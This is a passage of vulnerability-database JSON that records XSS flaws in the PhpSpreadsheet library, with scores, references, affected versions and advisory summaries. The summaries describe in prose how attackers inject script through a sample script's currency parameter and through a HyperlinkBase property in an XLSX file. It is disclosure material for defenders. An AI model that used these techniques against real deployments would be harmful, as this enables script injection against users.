url":"https://github.com/advisories/GHSA-rx7m-68vc-ppxh"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-rx7m-68vc-ppxh","reference_id":"GHSA-rx7m-68vc-ppxh","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-08-25T14:34:28Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-rx7m-68vc-ppxh"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/86243?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@1.30.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@1.30.0"},{"url":"http://public2.vulnerablecode.io/api/packages/86244?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@2.1.12","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@2.1.12"},{"url":"http://public2.vulnerablecode.io/api/packages/86245?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@2.4.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},
{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@2.4.0"},{"url":"http://public2.vulnerablecode.io/api/packages/86246?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@3.10.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@3.10.0"},{"url":"http://public2.vulnerablecode.io/api/packages/86247?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@5.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@5.0.0"}],"aliases":["CVE-2025-54370","GHSA-rx7m-68vc-ppxh"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-v6u5-m45s-tbch"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/56506?format=json","vulnerability_id":"VCID-wbjg-h8tu-vqak","summary":"Cross-Site Scripting (XSS) vulnerability in generateNavigation() function in PhpSpreadsheet\nThe researcher discovered a zero-day Cross-Site Scripting (XSS) vulnerability in the code which translates the XLSX file into an HTML representation and displays it in the 
response.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-22131","reference_id":"","reference_type":"","scores":[{"value":"0.00706","scoring_system":"epss","scoring_elements":"0.72531","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00706","scoring_system":"epss","scoring_elements":"0.72544","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00706","scoring_system":"epss","scoring_elements":"0.72564","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00706","scoring_system":"epss","scoring_elements":"0.72556","published_at":"2026-06-09T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-22131"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/PHPOffice/PhpSpreadsheet"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/4088381ccfaf241d7d42c333de0dc8c98e338743","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-21T14:58:10Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/4088381ccfaf241d7d42c333de0dc8c98e338743"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-22131","reference_id":"CVE-2025-22131","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1
","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-22131"},{"reference_url":"https://github.com/advisories/GHSA-79xx-vf93-p7cx","reference_id":"GHSA-79xx-vf93-p7cx","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-79xx-vf93-p7cx"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-79xx-vf93-p7cx","reference_id":"GHSA-79xx-vf93-p7cx","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-21T14:58:10Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-79xx-vf93-p7cx"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/83871?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@1.29.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@1.29.8"},{"url":"http://public2.vulnerablecode.io/
api/packages/83872?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@2.1.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@2.1.7"},{"url":"http://public2.vulnerablecode.io/api/packages/83873?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@2.3.6","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@2.3.6"},{"url":"http://public2.vulnerablecode.io/api/packages/83870?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@3.8.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@3.8.0"}],"aliases":["CVE-2025-22131","GHSA-79xx-vf93-p7cx"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-wbjg-h8tu-vqak"}],"fixing_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/56429?format=json","vulnerability_id":"VCID-4dcc-9f7b-7ygb"
,"summary":"PhpSpreadsheet allows unauthorized Reflected XSS in the Accounting.php file\n# Unauthorized Reflected XSS in the `Accounting.php` file\n\n**Product**: Phpspreadsheet\n**Version**: version 3.6.0\n**CWE-ID**: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')\n**CVSS vector v.3.1**: 8.2 (AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N)\n**CVSS vector v.4.0**: 8.3 (AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:L/SI:H/SA:L)\n**Description**: using the `/vendor/phpoffice/phpspreadsheet/samples/Wizards/NumberFormat/Accounting.php` script, an attacker can perform a XSS-type attack\n**Impact**: executing arbitrary JavaScript code in the browser\n**Vulnerable component**: the `/vendor/phpoffice/phpspreadsheet/samples/Wizards/NumberFormat/Accounting.php` file\n**Exploitation conditions**: an unauthorized user\n**Mitigation**: sanitization of the currency variable\n**Researcher**: Aleksey Solovev (Positive Technologies)\n\n# Research\n\nThe researcher discovered zero-day vulnerability Unauthorized Reflected Cross-Site Scripting (XSS) (in `Accounting.php` file) in Phpspreadsheet.\n\nThere is no sanitization in the `/vendor/phpoffice/phpspreadsheet/samples/Wizards/NumberFormat/Accounting.php` file, which leads to the possibility of a XSS attack.\nStrings are formed using the currency parameter without sanitization, which is controlled by the attacker.\n\n![fig7](https://github.com/user-attachments/assets/da0ee52d-2306-4770-a61d-bce4ba553f4f)\n\n*Figure 7. A fragment of the query in which a string and a parameter are formed without sanitization*\n\nAn attacker can prepare a special HTML form that will be automatically sent to the vulnerable scenario.\n\n*Listing 4. 
HTML form that demonstrates the exploitation of the XSS vulnerability*","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-56366","reference_id":"","reference_type":"","scores":[{"value":"0.01179","scoring_system":"epss","scoring_elements":"0.79112","published_at":"2026-06-05T12:55:00Z"},{"value":"0.01179","scoring_system":"epss","scoring_elements":"0.79114","published_at":"2026-06-09T12:55:00Z"},{"value":"0.01179","scoring_system":"epss","scoring_elements":"0.79096","published_at":"2026-06-08T12:55:00Z"},{"value":"0.01179","scoring_system":"epss","scoring_elements":"0.79109","published_at":"2026-06-07T12:55:00Z"},{"value":"0.01179","scoring_system":"epss","scoring_elements":"0.79118","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-56366"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:L/SI:H/SA:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/PHPOffice/PhpSpreadsheet"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/700a80346be269af668914172bc6f4521982d0b4","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:L/SI:H/SA:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-01-03T18:15:43Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/700a80346be269af668914172bc6f4521982d0b4"},{"refe
rence_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-56366","reference_id":"CVE-2024-56366","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:L/SI:H/SA:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-56366"},{"reference_url":"https://github.com/advisories/GHSA-c6fv-7vh8-2rhr","reference_id":"GHSA-c6fv-7vh8-2rhr","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-c6fv-7vh8-2rhr"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-c6fv-7vh8-2rhr","reference_id":"GHSA-c6fv-7vh8-2rhr","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:L/SI:H/SA:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-01-03T18:15:43Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-c6fv-7vh8-2rhr"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/83679?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@1.29.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"}
,{"vulnerability":"VCID-wbjg-h8tu-vqak"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@1.29.7"},{"url":"http://public2.vulnerablecode.io/api/packages/83680?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@2.1.6","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"},{"vulnerability":"VCID-wbjg-h8tu-vqak"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@2.1.6"},{"url":"http://public2.vulnerablecode.io/api/packages/83681?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@2.3.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"},{"vulnerability":"VCID-wbjg-h8tu-vqak"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@2.3.5"},{"url":"http://public2.vulnerablecode.io/api/packages/83678?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@3.7.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"},{"vulnerability":"VCID-wbjg-h8tu-vqak"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@3.7.0"}],"aliases":["CVE-2024-56366","GHSA-c6fv-7vh8
-2rhr"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-4dcc-9f7b-7ygb"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/56424?format=json","vulnerability_id":"VCID-ahdt-gmt1-7bb8","summary":"PhpSpreadsheet has a Cross-Site Scripting (XSS) vulnerability of the hyperlink base in the HTML page header\n# Cross-Site Scripting (XSS) vulnerability of the hyperlink base in the HTML page header\n\n**Product**: Phpspreadsheet\n**Version**: version 3.6.0\n**CWE-ID**: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')\n**CVSS vector v.3.1**: 5.4 (AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N)\n**CVSS vector v.4.0**: 4.8 (AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N)\n**Description**: the HTML page is formed without sanitizing the hyperlink base\n**Impact**: executing arbitrary JavaScript code in the browser\n**Vulnerable component**: class `PhpOffice\\PhpSpreadsheet\\Writer\\Html`, method `generateHTMLHeader`\n**Exploitation conditions**: a user viewing a specially generated Excel file\n**Mitigation**: additional sanitization of special characters in a string\n**Researcher**: Aleksey Solovev (Positive Technologies)\n\n# Research\n\nThe researcher discovered zero-day vulnerability Cross-Site Scripting (XSS) vulnerability of the hyperlink base in the HTML page header in Phpspreadsheet.\nThe following code is written on the server, which translates the XLSX file into a HTML representation and displays it in the response.\n\n*Listing 8. Source code on the server*\n\n```\n<?php\n\nrequire __DIR__ . 
'/vendor/autoload.php';\n\n$inputFileName = './doc/Book1.xlsx';\n$spreadsheet = \\PhpOffice\\PhpSpreadsheet\\IOFactory::load($inputFileName);\n$writer = new \\PhpOffice\\PhpSpreadsheet\\Writer\\Html($spreadsheet);\nprint($writer->generateHTMLAll());\n```\n\nAn attacker can embed a payload in a file property that will result in the execution of arbitrary JavaScript code.\nThe Excel file is unpacked and a HyperlinkBase in the file is inserted into the `docProps/app.xml` file.\n\n![fig14](https://github.com/user-attachments/assets/f68ef7fc-e78e-4424-8753-4318b6ff51c3)\n\n*Figure 14. Embedding the payload* \n\nAfter the changes were made, a new archive with the xlsx extension was created. At the moment of converting the xlsx file into the HTML representation, a property is obtained that participates in the formation of a string without sanitization.\n\n![fig15](https://github.com/user-attachments/assets/0aa7398c-ddd9-4c5a-ab04-41af0236dcba)\n\n*Figure 15. Generating the HTML page header using the HyperlinkBase property* \n\nAfter generating and displaying the HTML representation of the XLSX file, arbitrary JavaScript code will be executed.\n<img width=\"356\" alt=\"fig16\" src=\"https://github.com/user-attachments/assets/c3694661-31e3-4be8-9a86-6eb4dd4647b5\" />\n\n*Figure 16. 
Executing arbitrary JavaScript code* \n\n# Credit\nThis vulnerability was discovered by **Aleksey Solovev (Positive Technologies)**","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-56411","reference_id":"","reference_type":"","scores":[{"value":"0.00905","scoring_system":"epss","scoring_elements":"0.76143","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00905","scoring_system":"epss","scoring_elements":"0.76123","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00905","scoring_system":"epss","scoring_elements":"0.76135","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00905","scoring_system":"epss","scoring_elements":"0.76142","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00905","scoring_system":"epss","scoring_elements":"0.76148","published_at":"2026-06-09T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-56411"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/PHPOffice/PhpSpreadsheet"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/45052f88e04c735d56457a8ffcdc40b2635a028e","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-03T17:36:33Z/"}],"url":"https://github.com/PHPOffice/Ph
pSpreadsheet/commit/45052f88e04c735d56457a8ffcdc40b2635a028e"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-56411","reference_id":"CVE-2024-56411","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-56411"},{"reference_url":"https://github.com/advisories/GHSA-hwcp-2h35-p66w","reference_id":"GHSA-hwcp-2h35-p66w","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-hwcp-2h35-p66w"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-hwcp-2h35-p66w","reference_id":"GHSA-hwcp-2h35-p66w","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-03T17:36:33Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-hwcp-2h35-p66w"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/83679?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@1.29.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-g
ub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"},{"vulnerability":"VCID-wbjg-h8tu-vqak"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@1.29.7"},{"url":"http://public2.vulnerablecode.io/api/packages/83680?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@2.1.6","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"},{"vulnerability":"VCID-wbjg-h8tu-vqak"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@2.1.6"},{"url":"http://public2.vulnerablecode.io/api/packages/83681?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@2.3.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"},{"vulnerability":"VCID-wbjg-h8tu-vqak"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@2.3.5"},{"url":"http://public2.vulnerablecode.io/api/packages/83678?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@3.7.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"},{"vulnerability":"VCID-wbjg-h8tu-vqak"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:c
